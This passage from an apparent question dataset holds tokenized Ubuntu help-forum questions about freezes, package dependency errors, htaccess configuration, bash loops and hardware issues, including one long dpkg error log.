i use at my workplace . whatever the cause is for the performance with ubuntu 12.04 or 12.10 alpha 2 , the situation does n't bode well for ubuntu . ubuntu aside , the hp sleekbook is a good performer for the price . i am certain once the ubuntu issue is worked on and solutions arise , the ubuntu performance will probably be better than ever .
166540	ubuntu 12.04 64-bit system freezes	ubuntu 12.04 lts system freezes completely , only way out is a hard reboot : ( it 's random , often while doing shotwell , sometime google earth , few times even while ejecting a sd drive ! i also had a few random warnings that compiz crashed ( maybe related ? ! ) . here are my specs : brand new desktop from system76 ubuntu 12.04 lts 64 bit kernel : 3.2.0-26-generic 3rd generation intel core i5 3570k ( 3.40ghz - 6mb cache - 4 cores - hd graphics 4000 ) 8 gb ddr3 - 1600 mhz 2 tb hdd
166542	why do the `` copy to '' and `` move to '' context menus in nautilus only offer `` home '' and `` desktop '' as options ?	why do the `` copy to '' and `` move to '' context menu options in nautilus only include `` home '' and `` desktop '' as options ? is there a way to add other places and even mounted external devices as options ?
166545	enabling kubuntu-desktop in ubuntu 12.04	i installed kubuntu-desktop and i still get the unity desktop . how do i enable the kde desktop ?
166556	htaccess problem	my problem is : when i create .htaccess file my browser shows 403 forbidden my htaccess code is options symlinksifownermatch < ifmodule mod_rewrite.c > rewriteengine on rewritecond % { request_uri } ! ^/ ( img|css|port/ . * ) $ rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule ^ ( [ ^/ ] * ) / ( [ ^/ ] * ) $ index.php ? page= $ 1 & id= $ 2 [ l ] my rewrite mod is enable index.php exists where is the problem . when i delete or rename htaccess the problem is gone this is my config serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www/ > options followsymlinks allowoverride all order deny , allow allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride all options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride all order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory >
166566	can not install adobe or skype due to ia32-libs error	i do n't usually post on such forums , but i finally gave up on figuring out what 's going on here and i need some help . i need to install adobe reader . i am running ubuntu 12.04 precise x64 on intel core 2 duo : $ uname -a linux edison 3.2.0-26-generic # 41-ubuntu smp thu jun 14 17:49:24 utc 2012 x86_64 x86_64 x86_64 gnu/linux i get the following error by attempting to `` sudo apt-get install acroread '' : the following packages have unmet dependencies : acroread : depends : ia32-libs ( > = 20080808 ) but it is not going to be installed depends : nspluginwrapper but it is not going to be installed e : unable to correct problems , you have held broken packages . if i try to install `` sudo apt-get install ia32-libs '' , i get : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages . finally , if i try to install `` sudo apt-get install ia32-libs-multiarch '' , i get : ia32-libs-multiarch : i386 : depends : bluez-alsa : i386 but it is not going to be installed depends : libgettextpo0 : i386 but it is not going to be installed depends : gstreamer0.10-plugins-base : i386 but it is not going to be installed depends : gstreamer0.10-plugins-good : i386 but it is not going to be installed depends : gtk2-engines : i386 but it is not going to be installed . . . does anyone have any idea what 's going on ?
166567	error occured while running sudo apt-get install -f	i get this error sub-process /usr/bin/dpkg returned an error code ( 1 ) so i tried sudo apt-get clean and autoclean . when i ran sudo dpkg -- configure -a : errors were encountered while processing : libgtk-3-0 remmina bamfdaemon unity-2d-panel mahjongg libbamf0 simple-scan ubuntuone-client-gnome gnome-control-center libbamf3-0 libmutter0 evince indicator-sound nautilus-sendto-empathy gnome-icon-theme-full update-notifier libnautilus-extension1a libqgpgme1 cairo-dock-plug-ins gwibber libgtk-3-bin nautilus gnomine gir1.2-mutter-3.0 vino libevince3-3 indicator-applet-complete librhythmbox-core5 zenity libunity-2d-private0 remmina-plugin-rdp cairo-dock-plug-ins-dbus-interface-python gnome-applets gir1.2-gtk-3.0 xdiagnose gnome-shell update-manager rhythmbox-plugin-cdrecorder python-ubuntu-sso-client libcaribou0 cairo-dock-core software-properties-gtk gir1.2-gkbd-3.0 libgwibber-gtk2 libubuntuoneui-3.0-1 libgldi3 awn-applet-cpufreq libclutter-1.0-0 shotwell libpanel- applet-4-0 unity-greeter processing was halted because there were too many errors . what to do in this situation ?
166569	gigabyte motherboard ga-ep45-ud3l cputemp and fan speed sensors not working	for example , the system monitor add-on for cairo-dock shows 0 degrees and 0 rpm ( although it does show the gpu temp on my video card ) . ... using ubuntu unity 12.04
166573	why is the total ram for my hp dm1 less than the actual it should be ?	first time poster , so i apologize right off the bat if i 'm doing something wrong ( following murphy 's law , i probably am ) . anyway , i was wondering why the 2gb ram i have installed in my hp pavilion dm1 ( e-450 variant ) is only being recognized as 1.6gb . is it because i configured something wrong ( or failed to configure something ) ? one guess i have as to where the remaining 400mb is going is the video card , which ( based on ubuntu tweak ) uses 380+mb of memory . i know that i can make use of the full 2gb ; windows 7 says as much . i 'm running on ubuntu 12.04 .
166576	java icetea plugin not working	i installed java icedtea plugin 6 on ubuntu 11.10 . it doesnt work in chrome , and it continues to crash in firefox , 100 % of the time . i tried re-installing and updating but nothing seems to work . how can i fix this ?
166581	why does `` pkg-config '' print only a blank space with the `` -- cflags '' option ?	i installed libcurl using : sudo apt-get install libcurl4-openssl-dev . when i try to compile my program i read that we have to pass where libcurl is located to the gcc compiler ( although for me its located at /usr/include ) . therefore according to http : //ubuntuforums.org/showthread.php ? t=1175115 i compiled it using gcc myfile.c $ ( pkg-config -- libs -- cflags libcurl ) -o myprogram but if i only enter pkg-config -- cflags libcurl it prints nothing ( only a blank space ) . the program compiles correctly if i add the flag and -- libs . i only do not understand why pkg-config -- cflags libcurl returns nothing )
166583	bash for loop with range { # .. # }	the { # .. # } generate a sequence of numbers or chars , similarly to range ( ) in python . if i execute the command echo { 1..5 } in the command line i have : 1 2 3 4 5 instead the following bash script does n't work as expected . for i in { 1..3 } ; do echo `` iteration $ i '' done will print : iteration { 1..3 } why ? *i could use seq but i read it 's outdate ( http : //www.cyberciti.biz/faq/bash-for-loop/ )
166584	change filetype icon ( pcmanfm lxde )	i 've been trying to change the icon for the filetype *.eml ( message/rfc822 ) within pcmanfm ( file manager of lxde ) but after severall hours and many lines read and tried , i still can not find a working solution , neither for pcmanfm nor for nautilus . i have a 48x48 png file called thunderbird.png which i would like to make the image of the *.eml files i 've tried with : xdg-icon-resource xdg-icon-resource install -- context mimetypes -- mode user -- size 48 ./thunderbird.png message-rfc822 assogiate changed the default icon for the message/rfc822 , but it did not changed anything nor in pcmanfm nor in nautilus and this other solution for gnome/nautilus did n't worked also ... does anyone have a clue/idea of how to solve this ? i 'm trying to show a person that everything he does with windows can be done with linux , and he works a lot with email_files.eml that in windows show up with the thunderbird icon ... cheers
166589	installed applications are missing after restart : ubuntu 12.04	i am new to ubuntu and downloaded the latest 12.04 , however i installed programs such as chrome , adobe etc after restarting i ca n't find none of those and home screen of ubuntu looks like untouched please help.so do i have to download them again ? .thanks !
166592	how to fix mistake specifying partition sizes during installation alongside other os ?	i wanted to install ubuntu alongside windows 7 . when it asked me to allocate the partition size i by mistake dragged the panel . i was unaware of that it will allocate that size for ubuntu . and i had 27 gb free space in memory and now i have 6 gb left . and also the ubuntu installation is also not complete . i want to reclaim that space and install ubuntu along woth the windows 7 .
166596	left hand side speaker not working in ubuntu 12.04	i am using dell inspiron zino 300 with atom processor and 1gb ram . it came with ubuntu 9.04 preinstalled . i have now installed ubuntu 12.04 in place of it . everything seems to be working fine except the sound . i have two external speakers but sound is coming only out of the right speaker . any suggestions to work around this ?
166598	ubuntu freezes , mostly when chrome is being used	i recently used the ubuntu windows installer to install ubuntu on my toshiba satellite laptop ( 64-bit , core i3 , 4gb ram ) . for some reason , while i 'm using it , the whole computer frequently freezes . the mouse can sometimes move , but it is never able to do anything . ubuntu would freeze often when chrome was running , but it also happens at other times . is this a common problem and how do i prevent it ?
166599	samsung series 9 np900x4c-a03us dual boot windows 7	how do i get usb install of 12.04 installed ? how do i change the bios ? how do i partition the disk for dual boot ? web instructions for usb iso bootable image were confusing . series 9 has new , uefi compatible bios - there is a gotcha involving `` fast bios mode '' the native windows install included 2 partitions that were hard to get rid of : 21gb ntfs for `` samsung-rec '' ... recovery 8gb for hibernation both of the above were hard to get rid of in windows .
166602	why is it possible to convert a file just by renaming its extension ?	when you rename files into a different , most of the times it does not work . but , suppose you have a .png file , you can just rename `` image.png '' to `` image.jpeg '' or `` image.gif '' , it automatically gets converted to the other format and works perfectly fine . is there some similarity between these formats which allows this to be done ? i had noticed this a few years back , and got interested when i was trying too convert a .dvi file to a .pdf file , a just renaming it worked .
166603	error when trying to run truecrypt 7.1a x64	when i run truecrypt 7.1a x64 i get this error : 1 : /usr/bin/truecrypt : syntax error : `` ) '' unexpected how to work around this error ?
166606	what is equivalent of windows ' hosts file ?	i want to redirect some sites to localhost . i can use hosts file which resides in directory c : \windows\system32\drivers\etc in windows . which is equivalent of this file in ubuntu ?
166611	quicklaunch icons can no longer change size	when i first installed ubuntu 12.04 , i could change the quicklaunch icon size in the display settings or through unity in ubuntu tweak but as of late , i can no longer find/see the option to change my icon size . is this a problem with ubuntu 12.04 or am i being stupid and not looking in the right place ?
166616	how do i make the led stop blinking during network activity with an intel pro/wireless 5100 agn ?	i have a hp laptop . it has a network switch that allows to disable wireless networking . it is blue when working , orange when not working . at least , that 's what it was with 10.04 . now it is blue when working , but flashes with blue/orange when there is some sort of networking activity . i would like to go back to the time when it just stayed blue if on , rather than showing network activity . how to do that ? edit : here is the command you asked : http : //pastebin.com/fbgzrpe9 and here is the second one : http : //pastebin.com/icxprbxw
166622	error sub-process /usr/bin/dpkg returned an error code ( 1 ) while running sudo apt-get install -f	[ sudo ] password for rahul : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : gnome-icon-theme-full libgail-3-0 libgtk-3-0 libgtk-3-bin libqgpgme1 the following packages will be upgraded : gnome-icon-theme-full libgail-3-0 libgtk-3-0 libgtk-3-bin libqgpgme1 5 upgraded , 0 newly installed , 0 to remove and 265 not upgraded . 409 not fully installed or removed . need to get 0 b/11.1 mb of archives . after this operation , 110 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of libgtk-3-0 : libgtk-3-0 depends on libgtk-3-common ( = 3.4.1-0ubuntu1 ) ; however : version of libgtk-3-common on system is 3.4.2-0ubuntu0.4 . dpkg : error processing libgtk-3-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgldi3 : libgldi3 depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libgldi3 ( -- configure ) : no apport report written because maxreports is reached already dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cairo-dock-core : cairo-dock-core depends on libgldi3 ; however : package libgldi3 is not configured yet . cairo-dock-core depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing cairo-dock-core ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cairo-dock-plug-ins : cairo-dock-plug-ins depends on cairo-dock-core ( > = 3.0.0.1 ) ; however : package cairo-dock-core is not configured yet . cairo-dock-plug-ins depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing cairo-dock-plug-ins ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cairo-dock-plug-ins-dbus-interface-python : cairo-dock-plug-ins-dbus-interface-python depends on cairo-dock-plug-ins ( > = 3.0.0.1-0ubuntu2 ) ; however : package cairo-dock-plug-ins is not configured yet . dpkg : error processing cairo-dock-plug-ins-dbus-interface-python ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgail-3-0 : libgail-3-0 depends on libgtk-3-0 ( = 3.4.2-0ubuntu0.2 ) ; however : version of libgtk-3-0 on system is 3.4.1-0ubuntu1 . dpkg : error processing libgail-3-0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cairo-dock-plug-ins-integration : cairo-dock-plug-ins-integration depends on cairo-dock-core ( > = 3.0.0.1 ) ; however : package cairo-dock-core is not configured yet . dpkg : error processing cairo-dock-plug-ins-integration ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of bamfdaemon : bamfdaemon depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing bamfdaemon ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libbamf0 : libbamf0 depends on bamfdaemon ( = 0.2.118-0ubuntu0.1 ) ; however : package bamfdaemon is not configured yet . dpkg : error processing libbamf0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libbamf3-0 : libbamf3-0 depends on bamfdaemon ( = 0.2.118-0ubuntu0.1 ) ; however : package bamfdaemon is not configured yet . dpkg : error processing libbamf3-0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libcaribou0 : libcaribou0 depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libcaribou0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gir1.2-gtk-3.0 : gir1.2-gtk-3.0 depends on libgtk-3-0 ( > = 3.3.18 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing gir1.2-gtk-3.0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libclutter-1.0-0 : libclutter-1.0-0 depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libclutter-1.0-0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gir1.2-clutter-1.0 : gir1.2-clutter-1.0 depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . gir1.2-clutter-1.0 depends on libclutter-1.0-0 ( > = 1.9.16 ) ; however : package libclutter-1.0-0 is not configured yet . dpkg : error processing gir1.2-clutter-1.0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgtksourceview-3.0-0 : libgtksourceview-3.0-0 depends on libgtk-3-0 ( > = 3.4.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libgtksourceview-3.0-0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python-ubuntu-sso-client : python-ubuntu-sso-client depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . dpkg : error processing python-ubuntu-sso-client ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-sso-client : ubuntu-sso-client depends on python-ubuntu-sso-client ( = 3.0.0-0ubuntu2 ) ; however : package python-ubuntu-sso-client is not configured yet . dpkg : error processing ubuntu-sso-client ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-sso-client-qt : ubuntu-sso-client-qt depends on python-ubuntu-sso-client ( = 3.0.0-0ubuntu2 ) ; however : package python-ubuntu-sso-client is not configured yet . ubuntu-sso-client-qt depends on ubuntu-sso-client ( = 3.0.0-0ubuntu2 ) ; however : package ubuntu-sso-client is not configured yet . dpkg : error processing ubuntu-sso-client-qt ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-sso-client-gtk : ubuntu-sso-client-gtk depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . ubuntu-sso-client-gtk depends on python-ubuntu-sso-client ( = 3.0.0-0ubuntu2 ) ; however : package python-ubuntu-sso-client is not configured yet . ubuntu-sso-client-gtk depends on ubuntu-sso-client ( = 3.0.0-0ubuntu2 ) ; however : package ubuntu-sso-client is not configured yet . dpkg : error processing ubuntu-sso-client-gtk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of apport-gtk : apport-gtk depends on gir1.2-gtk-3.0 ( > = 3.1.90 ) ; however : package gir1.2-gtk-3.0 is not configured yet . dpkg : error processing apport-gtk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libedataserverui-3.0-1 : libedataserverui-3.0-1 depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libedataserverui-3.0-1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libpanel-applet-4-0 : libpanel-applet-4-0 depends on libgtk-3-0 ( > = 3.3.8 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libpanel-applet-4-0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-panel : gnome-panel depends on libedataserverui-3.0-1 ( > = 3.2.3 ) ; however : package libedataserverui-3.0-1 is not configured yet . gnome-panel depends on libgtk-3-0 ( > = 3.3.8 ) ; however : package libgtk-3-0 is not configured yet . gnome-panel depends on libpanel-applet-4-0 ( > = 2.91.93 ) ; however : package libpanel-applet-4-0 is not configured yet . dpkg : error processing gnome-panel ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgtk-3-bin : libgtk-3-bin depends on libgtk-3-0 ( > = 3.4.2-0ubuntu0.2 ) ; however : version of libgtk-3-0 on system is 3.4.1-0ubuntu1 . libgtk-3-bin depends on libgtk-3-common ( = 3.4.2-0ubuntu0.2 ) ; however : version of libgtk-3-common on system is 3.4.2-0ubuntu0.4 . dpkg : error processing libgtk-3-bin ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-icon-theme-full : gnome-icon-theme-full depends on gnome-icon-theme ( = 3.4.0-0ubuntu1 ) ; however : version of gnome-icon-theme on system is 3.4.0-0ubuntu1.1 . dpkg : error processing gnome-icon-theme-full ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-icon-theme : gnome-icon-theme depends on libgtk-3-bin ; however : package libgtk-3-bin is not configured yet . dpkg : error processing gnome-icon-theme ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gir1.2-panelapplet-4.0 : gir1.2-panelapplet-4.0 depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . gir1.2-panelapplet-4.0 depends on libpanel-applet-4-0 ( > = 2.91.93 ) ; however : package libpanel-applet-4-0 is not configured yet . dpkg : error processing gir1.2-panelapplet-4.0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-applets : gnome-applets depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . gnome-applets depends on libpanel-applet-4-0 ( > = 2.91.93 ) ; however : package libpanel-applet-4-0 is not configured yet . gnome-applets depends on gnome-panel ( > = 2.91.91 ) ; however : package gnome-panel is not configured yet . gnome-applets depends on gnome-icon-theme ( > = 2.15.91 ) ; however : package gnome-icon-theme is not configured yet . gnome-applets depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . gnome-applets depends on gir1.2-panelapplet-4.0 ; however : package gir1.2-panelapplet-4.0 is not configured yet . dpkg : error processing gnome-applets ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of awn-applet-cpufreq : awn-applet-cpufreq depends on gnome-applets ; however : package gnome-applets is not configured yet . dpkg : error processing awn-applet-cpufreq ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of awn-applets-all : awn-applets-all depends on awn-applet-cpufreq ; however : package awn-applet-cpufreq is not configured yet . dpkg : error processing awn-applets-all ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cairo-dock : cairo-dock depends on cairo-dock-core ( > = 3.0.0.1-0ubuntu1 ) ; however : package cairo-dock-core is not configured yet . cairo-dock depends on cairo-dock-plug-ins ( > = 3.0.0.0beta1 ) ; however : package cairo-dock-plug-ins is not configured yet . cairo-dock depends on cairo-dock-plug-ins-integration ( > = 3.0.0.0beta1 ) ; however : package cairo-dock-plug-ins-integration is not configured yet . cairo-dock depends on cairo-dock-plug-ins-dbus-interface-python ( > = 3.0.0.0beta1 ) ; however : package cairo-dock-plug-ins-dbus-interface-python is not configured yet . dpkg : error processing cairo-dock ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of empathy : empathy depends on libgtk-3-0 ( > = 3.3.6 ) ; however : package libgtk-3-0 is not configured yet . empathy depends on gnome-icon-theme ( > = 2.30.0 ) ; however : package gnome-icon-theme is not configured yet . dpkg : error processing empathy ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgrip0 : libgrip0 depends on libgtk-3-0 ( > = 3.0.8-0ubuntu1 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libgrip0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of eog : eog depends on libgrip0 ; however : package libgrip0 is not configured yet . eog depends on libgtk-3-0 ( > = 3.3.18 ) ; however : package libgtk-3-0 is not configured yet . eog depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . eog depends on gnome-icon-theme ( > = 2.19.1 ) ; however : package gnome-icon-theme is not configured yet . dpkg : error processing eog ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libevince3-3 : libevince3-3 depends on libgail-3-0 ( > = 3.0.0 ) ; however : package libgail-3-0 is not configured yet . libevince3-3 depends on libgrip0 ; however : package libgrip0 is not configured yet . libevince3-3 depends on libgtk-3-0 ( > = 3.0.2 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libevince3-3 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libnautilus-extension1a : libnautilus-extension1a depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libnautilus-extension1a ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of evince : evince depends on libevince3-3 ( = 3.4.0-0ubuntu1.1 ) ; however : package libevince3-3 is not configured yet . evince depends on libgtk-3-0 ( > = 3.0.2 ) ; however : package libgtk-3-0 is not configured yet . evince depends on libnautilus-extension1a ( > = 1:2.91 ) ; however : package libnautilus-extension1a is not configured yet . evince depends on gnome-icon-theme ( > = 2.17.1 ) ; however : package gnome-icon-theme is not configured yet . dpkg : error processing evince ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of evolution-data-server : evolution-data-server depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing evolution-data-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gir1.2-caribou-1.0 : gir1.2-caribou-1.0 depends on libcaribou0 ( = 0.4.2-1ubuntu1 ) ; however : package libcaribou0 is not configured yet . dpkg : error processing gir1.2-caribou-1.0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gir1.2-gkbd-3.0 : gir1.2-gkbd-3.0 depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . dpkg : error processing gir1.2-gkbd-3.0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gir1.2-gtksource-3.0 : gir1.2-gtksource-3.0 depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . gir1.2-gtksource-3.0 depends on libgtksourceview-3.0-0 ( > = 3.3.4 ) ; however : package libgtksourceview-3.0-0 is not configured yet . dpkg : error processing gir1.2-gtksource-3.0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-themes-standard : gnome-themes-standard depends on libgtk-3-0 ( > = 3.3.14 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing gnome-themes-standard ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libmutter0 : libmutter0 depends on libclutter-1.0-0 ( > = 1.9.10 ) ; however : package libclutter-1.0-0 is not configured yet . libmutter0 depends on libgtk-3-0 ( > = 3.3.7 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libmutter0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gir1.2-mutter-3.0 : gir1.2-mutter-3.0 depends on gir1.2-clutter-1.0 ; however : package gir1.2-clutter-1.0 is not configured yet . gir1.2-mutter-3.0 depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . gir1.2-mutter-3.0 depends on libmutter0 ( < < 3.5 ) ; however : package libmutter0 is not configured yet . gir1.2-mutter-3.0 depends on libmutter0 ( > = 3.4 ) ; however : package libmutter0 is not configured yet . dpkg : error processing gir1.2-mutter-3.0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of librhythmbox-core5 : librhythmbox-core5 depends on libgtk-3-0 ( > = 3.1.4 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing librhythmbox-core5 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gir1.2-rb-3.0 : gir1.2-rb-3.0 depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . gir1.2-rb-3.0 depends on librhythmbox-core5 ( > = 2.96 ) ; however : package librhythmbox-core5 is not configured yet . dpkg : error processing gir1.2-rb-3.0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-settings-daemon : gnome-settings-daemon depends on libgtk-3-0 ( > = 3.3.4 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing gnome-settings-daemon ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntuone-client : ubuntuone-client depends on ubuntu-sso-client ( > = 2.99.91 ) ; however : package ubuntu-sso-client is not configured yet . dpkg : error processing ubuntuone-client ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libsyncdaemon-1.0-1 : libsyncdaemon-1.0-1 depends on ubuntuone-client ( > = 3.0.1-0ubuntu1.0.1 ) ; however : package ubuntuone-client is not configured yet . dpkg : error processing libsyncdaemon-1.0-1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntuone-client-gnome : ubuntuone-client-gnome depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . ubuntuone-client-gnome depends on libnautilus-extension1a ( > = 1:2.91 ) ; however : package libnautilus-extension1a is not configured yet . ubuntuone-client-gnome depends on libsyncdaemon-1.0-1 ; however : package libsyncdaemon-1.0-1 is not configured yet . ubuntuone-client-gnome depends on ubuntuone-client ( > = 2.0.0 ) ; however : package ubuntuone-client is not configured yet . ubuntuone-client-gnome depends on gnome-settings-daemon ; however : package gnome-settings-daemon is not configured yet . dpkg : error processing ubuntuone-client-gnome ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libubuntuoneui-3.0-1 : libubuntuoneui-3.0-1 depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . libubuntuoneui-3.0-1 depends on libsyncdaemon-1.0-1 ; however : package libsyncdaemon-1.0-1 is not configured yet . libubuntuoneui-3.0-1 depends on ubuntu-sso-client ( > = 2.99.0 ) ; however : package ubuntu-sso-client is not configured yet . dpkg : error processing libubuntuoneui-3.0-1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : too many errors , stopping no apport report written because maxreports is reached already errors were encountered while processing : libgtk-3-0 libgldi3 cairo-dock-core cairo-dock-plug-ins cairo-dock-plug-ins-dbus-interface-python libgail-3-0 cairo-dock-plug-ins-integration bamfdaemon libbamf0 libbamf3-0 libcaribou0 gir1.2-gtk-3.0 libclutter-1.0-0 gir1.2-clutter-1.0 libgtksourceview-3.0-0 python-ubuntu-sso-client ubuntu-sso-client ubuntu-sso-client-qt ubuntu-sso-client-gtk apport-gtk libedataserverui-3.0-1 libpanel-applet-4-0 gnome-panel libgtk-3-bin gnome-icon-theme-full gnome-icon-theme gir1.2-panelapplet-4.0 gnome-applets awn-applet-cpufreq awn-applets-all 